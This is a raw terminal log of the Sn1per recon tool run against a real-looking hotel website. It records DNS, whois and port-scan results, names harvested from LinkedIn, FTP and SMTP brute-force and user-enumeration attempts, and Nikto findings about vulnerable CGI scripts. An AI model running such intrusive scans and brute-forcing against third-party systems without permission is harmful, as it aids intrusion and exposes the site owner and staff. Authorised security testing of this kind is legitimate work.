- root@kali:~/Sn1per-master# ./sniper
- ____
- _________ / _/___ ___ _____
- / ___/ __ \ / // __ \/ _ \/ ___/
- (__ ) / / // // /_/ / __/ /
- /____/_/ /_/___/ .___/\___/_/
- /_/
- + -- --=[http://crowdshield.com
- + -- --=[sn1per v1.3 by 1N3
- + -- --=[Usage: sn1per <target>
- root@kali:~/Sn1per-master# clear
- root@kali:~/Sn1per-master# ./sniper www.lasdunashotel.com
- ____
- _________ / _/___ ___ _____
- / ___/ __ \ / // __ \/ _ \/ ___/
- (__ ) / / // // /_/ / __/ /
- /____/_/ /_/___/ .___/\___/_/
- /_/
- + -- --=[http://crowdshield.com
- + -- --=[sn1per v1.3 by 1N3
- ################################### Running recon #################################
- Server: 192.168.179.2
- Address: 192.168.179.2#53
- Non-authoritative answer:
- www.lasdunashotel.com canonical name = lasdunashotel.com.
- Name: lasdunashotel.com
- Address: 192.185.26.214
- www.lasdunashotel.com is an alias for lasdunashotel.com.
- lasdunashotel.com has address 192.185.26.214
- lasdunashotel.com mail is handled by 0 lasdunashotel.com.
- ; <<>> DiG 9.9.5-9+deb8u3-Debian <<>> -x www.lasdunashotel.com
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 18269
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; MBZ: 0005 , udp: 4000
- ;; QUESTION SECTION:
- ;com.lasdunashotel.www.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 5 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015072210 1800 900 604800 3600
- ;; Query time: 162 msec
- ;; SERVER: 192.168.179.2#53(192.168.179.2)
- ;; WHEN: Tue Sep 29 12:04:56 EDT 2015
- ;; MSG SIZE rcvd: 131
- Whois Server Version 2.0
- Domain names in the .com and .net domains can now be registered
- with many different competing registrars. Go to http://www.internic.net
- for detailed information.
- No match for "WWW.LASDUNASHOTEL.COM".
- >>> Last update of whois database: Tue, 29 Sep 2015 16:04:44 GMT <<<
- NOTICE: The expiration date displayed in this record is the date the
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not necessarily reflect the expiration
- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access or query our Whois
- database through the use of electronic processes that are high-volume and
- automated except as reasonably necessary to register domain names or
- modify existing registrations; the Data in VeriSign Global Registry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons in obtaining information
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois query, you agree to abide
- by the following terms of use: You agree that you may use this Data only
- for lawful purposes and that under no circumstances will you use this Data
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automated, electronic processes
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this Data is expressly
- prohibited without the prior written consent of VeriSign. You agree not to
- use electronic processes that are automated and high-volume to access or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in its sole discretion to ensure
- operational stability. VeriSign may restrict or terminate your access to the
- Whois database for failure to abide by these terms of use. VeriSign
- reserves the right to modify these terms at any time.
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- For more information on Whois status codes, please visit
- https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.6 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- [-] Searching in Google:
- Searching 0 results...
- Searching 100 results...
- [+] Emails found:
- ------------------
- No emails found
- [+] Hosts found in search engines:
- ------------------------------------
- No hosts found
- [-] Searching in Bing:
- Searching 50 results...
- Searching 100 results...
- [+] Emails found:
- ------------------
- @www.lasdunashotel.com
- [+] Hosts found in search engines:
- ------------------------------------
- No hosts found
- [-] Searching in Linkedin..
- Searching 100 results..
- Users from Linkedin:
- ====================
- Israel Junior Martinez Alvarez
- Virginia De Miguel
- Barry Ivan WHITE
- Luisa Kiss
- [-] Searching in 123People..
- Searching 0 results...
- Searching 100 results...
- Users from 123People:
- =====================
- [+] Emails found:
- ------------------
- No emails found
- [+] Hosts found in search engines:
- ------------------------------------
- dnsenum.pl VERSION:1.2.3
- ----- www.lasdunashotel.com -----
- Host's addresses:
- __________________
- lasdunashotel.com. 5 IN A 192.185.26.214
- Name Servers:
- ______________
- ns838.websitewelcome.com. 5 IN A 192.185.26.188
- ns837.websitewelcome.com. 5 IN A 192.185.26.183
- Mail (MX) Servers:
- ___________________
- lasdunashotel.com. 5 IN A 192.185.26.214
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for www.lasdunashotel.com on ns837.websitewelcome.com ...
- AXFR record query failed: timeout
- Trying Zone Transfer for www.lasdunashotel.com on ns838.websitewelcome.com ...
- AXFR record query failed: timeout
- brute force file not specified, bay.
- ./sniper: línea 78: bin/dnsdict6: Permiso denegado
- + -- --=[Checking for SPF records on www.lasdunashotel.com...
- ################################### Pinging host ###################################
- PING lasdunashotel.com (192.185.26.214) 56(84) bytes of data.
- 64 bytes from 192-185-26-214.unifiedlayer.com (192.185.26.214): icmp_seq=1 ttl=128 time=267 ms
- --- lasdunashotel.com ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 267.345/267.345/267.345/0.000 ms
- ################################### Running port scan ##############################
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:05 EDT
- Warning: 192.185.26.214 giving up on port because retransmission cap hit (6).
- Nmap scan report for www.lasdunashotel.com (192.185.26.214)
- Host is up (0.091s latency).
- rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
- Not shown: 972 closed ports, 11 filtered ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- 25/tcp open smtp Exim smtpd 4.85
- |_smtp-commands: SMTP EHLO www.lasdunashotel.com: failed to receive data: connection closed
- 26/tcp open smtp Exim smtpd 4.85
- |_smtp-commands: Couldn't establish connection on port 26
- |_ssl-date: 2015-09-29T16:14:13+00:00; -3s from scanner time.
- 53/tcp open domain?
- 80/tcp open http nginx 1.8.0
- |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
- |_http-server-header: nginx/1.8.0
- |_http-title: Hoteles en Ica Peru Las Dunas Hotel & Resort
- 110/tcp open pop3 Dovecot pop3d
- |_pop3-capabilities: AUTH-RESP-CODE RESP-CODES TOP PIPELINING SASL(PLAIN LOGIN) STLS CAPA USER UIDL
- | ssl-cert: Subject: commonName=*.websitewelcome.com
- | Not valid before: 2015-01-05T00:00:00
- |_Not valid after: 2018-01-04T23:59:59
- |_ssl-date: TLS randomness does not represent time
- 119/tcp open nntp?
- 143/tcp open imap Dovecot imapd
- |_imap-capabilities: OK AUTH=PLAIN listed LOGIN-REFERRALS AUTH=LOGINA0001 Pre-login more IDLE have capabilities IMAP4rev1 ID LITERAL+ post-login ENABLE SASL-IR NAMESPACE STARTTLS
- | ssl-cert: Subject: commonName=*.websitewelcome.com
- | Not valid before: 2015-01-05T00:00:00
- |_Not valid after: 2018-01-04T23:59:59
- |_ssl-date: TLS randomness does not represent time
- 443/tcp open ssl/ssl Apache httpd (SSL-only mode)
- | http-cisco-anyconnect:
- |_ ERROR: Not a Cisco ASA or unsupported version
- |_http-methods: No Allow or Public header in OPTIONS response (status code 302)
- |_http-server-header: Apache
- | http-title: 404 - PAGE NOT FOUND
- |_Requested resource was /404.html
- | ssl-cert: Subject: commonName=*.websitewelcome.com
- | Not valid before: 2015-01-05T00:00:00
- |_Not valid after: 2018-01-04T23:59:59
- |_ssl-date: 2015-09-29T16:14:19+00:00; -3s from scanner time.
- 465/tcp open ssl/smtp Exim smtpd 4.85
- |_smtp-commands: Couldn't establish connection on port 465
- 563/tcp open tcpwrapped
- 587/tcp open smtp Exim smtpd 4.85
- |_smtp-commands: SMTP EHLO www.lasdunashotel.com: failed to receive data: connection closed
- |_ssl-date: TLS randomness does not represent time
- 993/tcp open ssl/imap Dovecot imapd
- | imap-capabilities:
- |_ ERROR: Failed to connect to server
- | ssl-cert: Subject: commonName=*.websitewelcome.com
- | Not valid before: 2015-01-05T00:00:00
- |_Not valid after: 2018-01-04T23:59:59
- |_ssl-date: TLS randomness does not represent time
- 995/tcp open ssl/pop3 Dovecot pop3d
- |_pop3-capabilities: SASL(PLAIN LOGIN) UIDL PIPELINING TOP USER CAPA AUTH-RESP-CODE RESP-CODES
- | ssl-cert: Subject: commonName=*.websitewelcome.com
- | Not valid before: 2015-01-05T00:00:00
- |_Not valid after: 2018-01-04T23:59:59
- |_ssl-date: TLS randomness does not represent time
- 2222/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- 3306/tcp open mysql MySQL 5.5.42-37.1
- | mysql-info:
- | Protocol: 53
- | Version: .5.42-37.1
- | Thread ID: 17268187
- | Capabilities flags: 65535
- | Some Capabilities: InteractiveClient, Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsLoadDataLocal, SupportsCompression, Speaks41ProtocolOld, ConnectWithDatabase, SupportsTransactions, LongColumnFlag, LongPassword, IgnoreSigpipes, ODBCClient, DontAllowDatabaseTableColumn, SwitchToSSLAfterHandshake
- | Status: Autocommit
- |_ Salt: ;LM{G/S4JXY:RnS6Ry+f
- 8080/tcp open http nginx 1.8.0
- |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
- |_http-server-header: nginx/1.8.0
- |_http-title: Hoteles en Ica Peru Las Dunas Hotel & Resort
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port119-TCP:V=6.49BETA4%I=7%D=9/29%Time=560AB833%P=i586-pc-linux-gnu%r(
- SF:NULL,5C,"400\x20Cannot\x20connect\x20to\x20NNTP\x20server\x20192\.185\.
- SF:26\.214\x20\(192\.185\.26\.214:119\),\x20connect\x20error\x2010061\r\n"
- SF:);
- Device type: WAP|general purpose|storage-misc
- Running (JUST GUESSING): Actiontec Linux (95%), Linux 2.4.X|3.X (94%), Microsoft Windows 7|2012|XP (92%), BlueArc embedded (87%)
- OS CPE: cpe:/o:actiontec:linux_kernel cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_xp::sp3 cpe:/h:bluearc:titan_2100
- Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (95%), DD-WRT v24-sp2 (Linux 2.4.37) (94%), Linux 3.2 (93%), Microsoft Windows 7 or Windows Server 2012 (92%), Microsoft Windows XP SP3 (92%), BlueArc Titan 2100 NAS device (87%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 2 hops
- Service Info: Host: canto.websitewelcome.com
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 0.10 ms 192.168.179.2
- 2 0.10 ms 192-185-26-214.unifiedlayer.com (192.185.26.214)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 537.35 seconds
- ################################### Running Intrusive Scans ########################
- + -- --=[Port 21 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:14 EDT
- Nmap scan report for www.lasdunashotel.com (192.185.26.214)
- Host is up (0.023s latency).
- rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- | ftp-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 27 guesses in 59 seconds, average tps: 0
- |_ ERROR: Too many retries, aborted ...
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 63.03 seconds
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:15 EDT
- Nmap scan report for 192.168.1.113
- Host is up (0.00057s latency).
- PORT STATE SERVICE VERSION
- 25/tcp open smtp?
- | smtp-brute:
- |_ ERROR: Failed to connect to SMTP server
- |_smtp-commands: Couldn't establish connection on port 25
- | smtp-enum-users:
- |_ Couldn't establish connection on port 25
- |_smtp-open-relay: Couldn't establish connection on port 25
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 176.47 seconds
- Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
- ----------------------------------------------------------
- | Scan Information |
- ----------------------------------------------------------
- Mode ..................... VRFY
- Worker Processes ......... 5
- Usernames file ........... BruteX/simple-users.txt
- Target count ............. 1
- Username count ........... 58
- Target TCP port .......... 25
- Query timeout ............ 5 secs
- Target domain ............
- ######## Scan started at Tue Sep 29 12:18:44 2015 #########
- existsdunashotel.com: anonymous
- existsdunashotel.com: admin
- existsdunashotel.com: bee
- existsdunashotel.com: administrator
- existsdunashotel.com: administration
- existsdunashotel.com: apache
- ######## Scan completed at Tue Sep 29 12:19:14 2015 #########
- 6 results.
- 58 queries in 30 seconds (1.9 queries / sec)
- + -- --=[Port 53 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:19 EDT
- Nmap scan report for 192.168.1.113
- Host is up (0.00073s latency).
- PORT STATE SERVICE VERSION
- 25/tcp open smtp?
- Host script results:
- |_dns-brute: Can't guess domain of "192.168.1.113"; use dns-brute.domain script argument.
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 152.33 seconds
- + -- --=[Port 80 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:23 EDT
- Failed to resolve "www.lasdunashotel.com".
- WARNING: No targets were specified, so 0 hosts scanned.
- Nmap done: 0 IP addresses (0 hosts up) scanned in 2.45 seconds
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://www.lasdunashotel.com
- ERROR:root:Site http://www.lasdunashotel.com appears to be down
- http://www.lasdunashotel.com [200] Country[UNITED STATES][US], HTTPServer[nginx/1.8.0], IP[192.185.26.214], nginx[1.8.0]
- ./sniper: línea 179: xsstracer: no se encontró la orden
- + -- --=[Checking if X-Content options are enabled on www.lasdunashotel.com...
- + -- --=[Checking if X-Frame options are enabled on www.lasdunashotel.com...
- + -- --=[Checking if X-XSS-Protection header is enabled on www.lasdunashotel.com...
- + -- --=[Checking HTTP methods on www.lasdunashotel.com...
- + -- --=[Checking if TRACE method is enabled on www.lasdunashotel.com...
- + -- --=[Checking for open proxy on www.lasdunashotel.com...
- <html>
- <head>
- <meta name="robots" content="noarchive" />
- <meta name="googlebot" content="nosnippet" />
- </head>
- <body>
- <div align=center>
- <h3>Error. Page cannot be displayed. Please contact your service provider for more details. (1)</h3>
- </div>
- </body>
- </html>
- + -- --=[Enumerating software on www.lasdunashotel.com...
- Server: nginx/1.8.0
- + -- --=[Checking if Strict-Transport-Security is enabled on www.lasdunashotel.com...
- + -- --=[Checking for Flash cross-domain policy on www.lasdunashotel.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>302 Found</title>
- </head><body>
- <h1>Found</h1>
- <p>The document has moved <a href="http://www.lasdunashotel.com/index.php">here</a>.</p>
- <hr>
- <address>Apache Server at www.lasdunashotel.com Port 80</address>
- </body></html>
- + -- --=[Checking for Silverlight cross-domain policy on www.lasdunashotel.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>302 Found</title>
- </head><body>
- <h1>Found</h1>
- <p>The document has moved <a href="http://www.lasdunashotel.com/index.php">here</a>.</p>
- <hr>
- <address>Apache Server at www.lasdunashotel.com Port 80</address>
- </body></html>
- + -- --=[Checking for HTML5 cross-origin resource sharing on www.lasdunashotel.com...
- + -- --=[Retrieving robots.txt on www.lasdunashotel.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>302 Found</title>
- </head><body>
- <h1>Found</h1>
- <p>The document has moved <a href="http://www.lasdunashotel.com/index.php">here</a>.</p>
- <hr>
- <address>Apache Server at www.lasdunashotel.com Port 80</address>
- </body></html>
- + -- --=[Retrieving sitemap.xml on www.lasdunashotel.com...
- <?xml version="1.0" encoding="UTF-8"?>
- <urlset
- xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
- http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
- <!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->
- <url>
- <loc>http://lasdunashotel.com/</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/quienes_somos.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/eventos.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/informacion.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/contactenos.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/banner-no-perder.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/recomienda.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/registrese.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/index.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/banner-full-day.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/ubicacion.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/responsabilidad-social.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/sitemap.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=1</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=8</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=9</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=1</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=1</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=27</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/tarifas.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=8</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=11</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=12</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=13</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=14</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=17</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=18</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes-request.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/eventos-salones.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/eventos-programas.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/cuestionario.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=30</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=39</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/informacion-turistica.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/quienes_somos.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/habitaciones.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/eventos.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/informacion.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/contactenos.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/banner-no-perder.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/recomienda.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/informacion-turistica-detalle.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/informacion-turistica-detalle-nazca.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/informacion-turistica-detalle-paracas.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=8</loc>
- <changefreq>always</changefreq>
- </url>
- </urlset>
- + -- --=[Checking cookie attributes on www.lasdunashotel.com...
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.185.26.214
- + Target Hostname: www.lasdunashotel.com
- + Target Port: 80
- + Start Time: 2015-09-29 12:24:49 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: nginx/1.8.0
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
- + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
- + /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
- + /securecontrolpanel/: Web Server Control Panel
- + /webmail/: Web based mail package installed.
- + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
- + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
- + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
- + OSVDB-2117: /cpanel/: Web-based control panel
- + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
- + OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
- + OSVDB-3268: /includes/: Directory indexing found.
- + OSVDB-3092: /includes/: This might be interesting...
- + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
- + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
- + OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
